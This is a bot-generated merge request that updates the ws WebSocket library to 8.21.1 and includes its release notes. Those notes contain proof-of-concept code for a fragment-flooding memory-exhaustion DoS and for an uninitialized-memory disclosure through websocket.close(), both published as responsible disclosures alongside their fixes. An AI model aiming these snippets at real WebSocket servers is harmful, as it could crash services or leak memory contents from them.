chore(deps): update dependency ws to ^8.21.1
This MR contains the following updates:
| Package | Type | Update | Change | Pending |
|---|---|---|---|---|
| ws | dependencies | minor | ^8.19.0 -> ^8.21.1 |
8.21.2 |
MR created with the help of gitlab-org/frontend/renovate-gitlab-bot
Release Notes
websockets/ws (ws)
v8.21.1
Bug fixes
- Empty fragments are now counted toward the limit (
a2f4e7c). - The default values of the
maxBufferedChunksandmaxFragmentsoptions have been reduced (f197ac6).
v8.21.0
Features
- Introduced the
maxBufferedChunksandmaxFragmentsoptions (2b2abd4).
Bug fixes
- Fixed a remote memory exhaustion DoS vulnerability (
2b2abd4).
A high volume of tiny fragments and data chunks could be sent by a peer, using
modest network traffic, to crash a ws server or client due to OOM.
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`);
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(`client close - code: ${code} reason: ${reason.toString()}`);
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(`server close - code: ${code} reason: ${reason.toString()}`);
});
});The vulnerability was responsibly disclosed and fixed by Nadav Magier.
In vulnerable versions, the issue can be mitigated by lowering the value of the
maxPayload option if possible.
v8.20.1
Bug fixes
- Fixed an uninitialized memory disclosure issue in
websocket.close()(c0327ec).
Providing a TypedArray (e.g. Float32Array) as the reason argument for
websocket.close(), rather than the supported string or Buffer types, caused
uninitialized memory to be disclosed to the remote peer.
import { deepStrictEqual } from 'node:assert';
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer(
{ port: 0, skipUTF8Validation: true },
function () {
const { port } = wss.address();
const ws = new WebSocket(`ws://localhost:${port}`, {
skipUTF8Validation: true
});
ws.on('close', function (code, reason) {
deepStrictEqual(reason, Buffer.alloc(80));
});
}
);
wss.on('connection', function (ws) {
ws.close(1000, new Float32Array(20));
});The issue was privately reported by Nikita Skovoroda.
v8.20.0
Features
- Added exports for the
PerMessageDeflateclass and utilities for theSec-WebSocket-ExtensionsandSec-WebSocket-Protocolheaders (d3503c1).
Configuration
- If you want to rebase/retry this MR, check this box
This MR has been generated by Renovate Bot.